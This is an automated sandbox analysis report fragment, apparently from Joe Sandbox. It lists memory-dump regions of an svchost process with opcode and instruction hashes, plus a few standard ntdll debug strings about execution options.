                                                                                                              • Opcode Fuzzy Hash: 34f89cc48fbe178dbf4ed1b31122661894c3f0e199156d44a1468a67352ffb81
                                                                                                              • Instruction Fuzzy Hash: 6C012175A10349ABDB00DF69D941ADEB7F8EF49304F54406AE504FB380D6749D018BA5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6a352db2a3f745417ede24f64221d8c391962f96b386feb8b25d9f87fcbec53d
                                                                                                              • Instruction ID: 7270e43315c10eeda27e4c78f08fc97da91fbc9533c5d0fcdd8fcbf0dd98c94b
                                                                                                              • Opcode Fuzzy Hash: 6a352db2a3f745417ede24f64221d8c391962f96b386feb8b25d9f87fcbec53d
                                                                                                              • Instruction Fuzzy Hash: DCF0BE78A14348EBDB04EBB9D901FAEB7F4FF04304F0444A8A451EB2C1EA34E9008B55
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                              • Instruction ID: e2268fbe83d81c4760c75d6e3458985e05a41d1be36c8310f1cf81ffb6cd931c
                                                                                                              • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                              • Instruction Fuzzy Hash: 38E09272340A002BD722DE59CC80F47776EEF82B14F0404BAB5045E251CAE2DD0982A4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8753cbd97b5d3bf06dbcbd7736a44424deff857440fb81f6ee633843403e3582
                                                                                                              • Instruction ID: 5c6ee1c96ae5cd468553cb3fbfec6fb43d67bdf3b9e21df9d3538ba5b8ea98b2
                                                                                                              • Opcode Fuzzy Hash: 8753cbd97b5d3bf06dbcbd7736a44424deff857440fb81f6ee633843403e3582
                                                                                                              • Instruction Fuzzy Hash: 07F08274A14248AFDB04EBB9D945E9EB7F4EF09304F5400A9E511EB2D0EA74DE008715
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d75c3608b8f38d608db695b94c35d0c6c275b2d6262a440e06b7fde27c1f415f
                                                                                                              • Instruction ID: fe206489836c948336f4c6d1298df77443b22a8a97d6572704963480775a735b
                                                                                                              • Opcode Fuzzy Hash: d75c3608b8f38d608db695b94c35d0c6c275b2d6262a440e06b7fde27c1f415f
                                                                                                              • Instruction Fuzzy Hash: 81F0E272919E849FC721C31EC085B12B7D9DF0067CF0D88F0D4058F601CBA8C880C250
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b2186b69d75ca39eadf7484da6465927ee10c8c2479bb301209e3a315588bc54
                                                                                                              • Instruction ID: 9ceec99ee90537524107eed4adb7319d5a899752310b6532de26b4ecb63e9d91
                                                                                                              • Opcode Fuzzy Hash: b2186b69d75ca39eadf7484da6465927ee10c8c2479bb301209e3a315588bc54
                                                                                                              • Instruction Fuzzy Hash: 6FF08274A14348ABDB14EBB9D945F6EB3F8EF04704F0404A8A915EF2C5EA74E9008759
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ed2a8d81b5a7072fef0423eba42259129d24d063ad8e6f13851b88de59b7f91c
                                                                                                              • Instruction ID: 7aa6cd4ac2fd8ad313f312f3af233e43676ab2ef84e3b7e8388331fc4c9eb468
                                                                                                              • Opcode Fuzzy Hash: ed2a8d81b5a7072fef0423eba42259129d24d063ad8e6f13851b88de59b7f91c
                                                                                                              • Instruction Fuzzy Hash: 76F08274A14248EBDB04EBB9D905F6EB3F4EF04308F0400A9E911EF2C1EA74E900CB59
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                                              • Instruction ID: 81f1272957c0a134c7cdc94abb381e0ff85398bbb287fd9ebefe6a86f87ee159
                                                                                                              • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                                              • Instruction Fuzzy Hash: FDF0E53360471467C230AA0D8C15F5BFBACDBD5B74F14436ABA249B2D0DA70A911D7D6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 76004344d76d10e44630e2c6253ce4d1c3d7ae27db9dba9c9a7bfdd466257dbd
                                                                                                              • Instruction ID: 95cfafd97e43e2583cbbb8be19511018af315b2c24682ea579d21e4ddc121219
                                                                                                              • Opcode Fuzzy Hash: 76004344d76d10e44630e2c6253ce4d1c3d7ae27db9dba9c9a7bfdd466257dbd
                                                                                                              • Instruction Fuzzy Hash: 02F08275A10348ABDB04EBB9D555F9E77F4EF08708F0500A4E545EB280DA74DD019759
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                              • Instruction ID: 3ff06b650ff1dd8cf7e87dfd3ecdd327ea854e51057e7d46c98a687fee37b446
                                                                                                              • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                              • Instruction Fuzzy Hash: 71F0E53D304351DBDB15EF19D040A957BE8EF42358F0400F4E8468B300D731E981CB84
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                                                              • Instruction ID: cb2851ec7414d7da297ec9453fbe6108f86b3d4225d4bb08fc665fd23e71dccb
                                                                                                              • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                                                              • Instruction Fuzzy Hash: 3FE06D76210250AFE765DB58CE05FA673ECEB00720F180268B125DB0D0DAB0AE40CA64
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                              • Instruction ID: 94061db74ee17c7dadcb727717fe8cff0d06f8e72e0d1b050e137dc474482d8d
                                                                                                              • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                              • Instruction Fuzzy Hash: 8CE0C2343003058FD715CF1AC040BA2B7B6FFD5A14F68C0B8A8488F206EB72E842CB40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                                              • Instruction ID: 931c79758b096e5910d03a29f465af6f359159dff10e1e80b8f1b783f515e29c
                                                                                                              • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                                              • Instruction Fuzzy Hash: 80E0CD35244314B7DB22EA44CC00F697B55DB407D4F104071FA0C5E650C671DD51D6D4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                              • Instruction ID: f1ac6105e125fb0b4556380846fbdbe746b3b06ec30d5c67f0e450e14ff98c84
                                                                                                              • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                              • Instruction Fuzzy Hash: 08E08C35901B20EEDB31EF21DC04B527AA5FB48B18F144AF9E08A4E4A48770A891DA48
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7d7f61984b3566c060033c1d88b1f15863d22a0c2e9bc722d027a96287cdcd92
                                                                                                              • Instruction ID: c5eb9778552cf4e40cbb76b50cb6d27681f0d42b9c66d18dc474ae0d60dc165f
                                                                                                              • Opcode Fuzzy Hash: 7d7f61984b3566c060033c1d88b1f15863d22a0c2e9bc722d027a96287cdcd92
                                                                                                              • Instruction Fuzzy Hash: 7DF0ED34651B84CFF72ADF04C1E1B6173B9F755B44F5004A8D4468BBA1C73AAD41CA40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 42ad8b8aeb58af9e2bea13cdf5f23115bc8133d4fed716cd14db55008a3100c4
                                                                                                              • Instruction ID: b20052981d35e50294f1691ba7ef2f28584d5af88964d63cc176c5d20d26235a
                                                                                                              • Opcode Fuzzy Hash: 42ad8b8aeb58af9e2bea13cdf5f23115bc8133d4fed716cd14db55008a3100c4
                                                                                                              • Instruction Fuzzy Hash: EAE0C2322006606BC321FB5DDD00F4A739EEFA5364F044271F1548F690CA70AC10C798
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9a67625f6d5a6a77cb64058b22c0bd9c8afe0f49700dd0c98a26fb474c3b9e3a
                                                                                                              • Instruction ID: 4d6aa6816fe29882a3801b9e5e99b8317927aa2cde868f582fa8222d83d4cac6
                                                                                                              • Opcode Fuzzy Hash: 9a67625f6d5a6a77cb64058b22c0bd9c8afe0f49700dd0c98a26fb474c3b9e3a
                                                                                                              • Instruction Fuzzy Hash: 7B90022224545503D150B25C44446564006A7E0305F95C071A0818599D86658955A221
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fd2af12ae23907019786621ebea54e0139555b9838dec7fc85013a8680549373
                                                                                                              • Instruction ID: b00bfadc0acd02dfb2cf605f7cec2b244ef80db300d907a96184fb30d53d3e29
                                                                                                              • Opcode Fuzzy Hash: fd2af12ae23907019786621ebea54e0139555b9838dec7fc85013a8680549373
                                                                                                              • Instruction Fuzzy Hash: E3900222601404434140B26888849464006ABE1315795C171A099C555D866989659665
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e2fdf910f27150313d4b6193300780ff7abc3f517efd0a449ba53f1ba5ced015
                                                                                                              • Instruction ID: 6576dd90b0bed58c9f0b55aa825fbb7f305554df6125234ae0d6eae5c1f08767
                                                                                                              • Opcode Fuzzy Hash: e2fdf910f27150313d4b6193300780ff7abc3f517efd0a449ba53f1ba5ced015
                                                                                                              • Instruction Fuzzy Hash: 4190023220180803D100B2584848787000687D0306F95C061A516855AE8775C991A531
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 998c5a89550df1248490d796c9ab5eb1117d48eb074d8ad6e2602a8bb6457782
                                                                                                              • Instruction ID: c184b5e40f22b6d028b6ac4d283d5d462cbe42cc3ccc1adb89012ad3509cf16a
                                                                                                              • Opcode Fuzzy Hash: 998c5a89550df1248490d796c9ab5eb1117d48eb074d8ad6e2602a8bb6457782
                                                                                                              • Instruction Fuzzy Hash: 9E90023220180803D100B258485474B000687D0306F95C061A116855AD87358951A571
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8ceda480bcdaba3f9e63c1e01ec8751860344e9da6a9078200cb21b9546b646c
                                                                                                              • Instruction ID: 825b9771dab514d99775849990276a2d85d5e19300e96f1d06e84f143fdda1dc
                                                                                                              • Opcode Fuzzy Hash: 8ceda480bcdaba3f9e63c1e01ec8751860344e9da6a9078200cb21b9546b646c
                                                                                                              • Instruction Fuzzy Hash: 4D900222211C0443D200B6684C54B47000687D0307F95C165A0158559CCA2589619521
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e7d24c9674cd5903e0f476048c8ec2c5cdd71f64cf03f597e0ab23bec3b92bb4
                                                                                                              • Instruction ID: c3f17c4ac4c1d22316da7396fec091ea6027f69bf21693de135c1cc9439d322b
                                                                                                              • Opcode Fuzzy Hash: e7d24c9674cd5903e0f476048c8ec2c5cdd71f64cf03f597e0ab23bec3b92bb4
                                                                                                              • Instruction Fuzzy Hash: AA90026234140843D100B2584454B460006C7E1305F95C065E1068559D8729CD52A126
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 351c391620fea01c38dff108d1cd28980579a409bc471934e2e7a186344ecb64
                                                                                                              • Instruction ID: d9fda95fd42a1b5e1b01f680cfff01050327fb51f7f0ece9b285d8e12278d93e
                                                                                                              • Opcode Fuzzy Hash: 351c391620fea01c38dff108d1cd28980579a409bc471934e2e7a186344ecb64
                                                                                                              • Instruction Fuzzy Hash: DC90026221140443D104B2584444746004687E1305F95C062A2158559CC6398D619125
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0f93ee0c56157074a47705bff1cdd60e9b6823c553b105bc40c48e8c99ce2ed8
                                                                                                              • Instruction ID: 01d2caf658c794e214dc3f1e4e80c8e74329b08cf77db167abbfb0b991de54f6
                                                                                                              • Opcode Fuzzy Hash: 0f93ee0c56157074a47705bff1cdd60e9b6823c553b105bc40c48e8c99ce2ed8
                                                                                                              • Instruction Fuzzy Hash: 2690027220140803D140B2584444786000687D0305F95C061A5068559E87698ED5A665
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6e7a175350b943e8768812a3750e648f4aa8b6fbedd46b63dae9ca8802f8ce8f
                                                                                                              • Instruction ID: e65c0becdccbe14088bbe9223c7b1ce9ef7823d1be2883e420802027b199bed7
                                                                                                              • Opcode Fuzzy Hash: 6e7a175350b943e8768812a3750e648f4aa8b6fbedd46b63dae9ca8802f8ce8f
                                                                                                              • Instruction Fuzzy Hash: C690022260140903D101B2584444656000B87D0345FD5C072A102855AECB358A92E131
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2e29350c6a31ecd2ec2735014090ecf15276c477a647522c7bc93c701ee7cae4
                                                                                                              • Instruction ID: 198b08bf808e0b77bbe8559955f15e7da807bc6cec1139492ed32db0f835c7d9
                                                                                                              • Opcode Fuzzy Hash: 2e29350c6a31ecd2ec2735014090ecf15276c477a647522c7bc93c701ee7cae4
                                                                                                              • Instruction Fuzzy Hash: C490026220180803D140B6584844647000687D0306F95C061A206855AE8B398D51A135
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ae53ef9cc912038a5b237e39df16c5aedcaccfdd1903c1fcccc089f417feb1cd
                                                                                                              • Instruction ID: 36484d7eb8ebaee0688e66b67b53b2d8ae8da1f86db64d2262ebf08df3c239d4
                                                                                                              • Opcode Fuzzy Hash: ae53ef9cc912038a5b237e39df16c5aedcaccfdd1903c1fcccc089f417feb1cd
                                                                                                              • Instruction Fuzzy Hash: 7A90022230140803D102B2584454646000AC7D1349FD5C062E142855AD87358A53E132
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ff34c6c7fc9c62c7b74367096bc6594bb96ef10c3755786ec94a98a81958d13b
                                                                                                              • Instruction ID: 42b886f08f88d403a2010f0a4e8edb503d1498cc689daf32e84d5de261fa503d
                                                                                                              • Opcode Fuzzy Hash: ff34c6c7fc9c62c7b74367096bc6594bb96ef10c3755786ec94a98a81958d13b
                                                                                                              • Instruction Fuzzy Hash: A390023224140803D141B2584444646000A97D0345FD5C062A0428559E87658B56EA61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e7f9e40e446abc5808d2d2aa9d0a04ddf2b0d09a99d259a5366d588dc1da4461
                                                                                                              • Instruction ID: 9fb2c2f9acbd5040fd89e985db5b48c6b962049076afffaca145708a576b239d
                                                                                                              • Opcode Fuzzy Hash: e7f9e40e446abc5808d2d2aa9d0a04ddf2b0d09a99d259a5366d588dc1da4461
                                                                                                              • Instruction Fuzzy Hash: 0A900222242445535545F2584444547400797E03457D5C062A1418955C86369956D621
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 87fb3161d1265d0693639d2d644414ce13b54e115e1b81b26222ca907460b9d0
                                                                                                              • Instruction ID: 35301a685225214eed16baee6f5f3945a8b35a0b19d4290764abf5bc2409a119
                                                                                                              • Opcode Fuzzy Hash: 87fb3161d1265d0693639d2d644414ce13b54e115e1b81b26222ca907460b9d0
                                                                                                              • Instruction Fuzzy Hash: FD90022230140403D140B25854586464006D7E1305F95D061E0418559CDA2589569222
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: bda5b5553b7d9e6624aa9e52610cb85737c896891a2bbe68e934aa90c283b8d3
                                                                                                              • Instruction ID: 5c8af0b260fa8f49e82fee6a2bec37b672049d5b7af52ce6f4bafd1734a4b12b
                                                                                                              • Opcode Fuzzy Hash: bda5b5553b7d9e6624aa9e52610cb85737c896891a2bbe68e934aa90c283b8d3
                                                                                                              • Instruction Fuzzy Hash: 2951BAB5A04516BFCB10DB5C889097EFBB8FF48248B5885F9E475DB641D234DE44CBA0
                                                                                                              Strings
                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03BA4725
                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03BA4655
                                                                                                              • ExecuteOptions, xrefs: 03BA46A0
                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 03BA4787
                                                                                                              • Execute=1, xrefs: 03BA4713
                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03BA4742
                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03BA46FC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
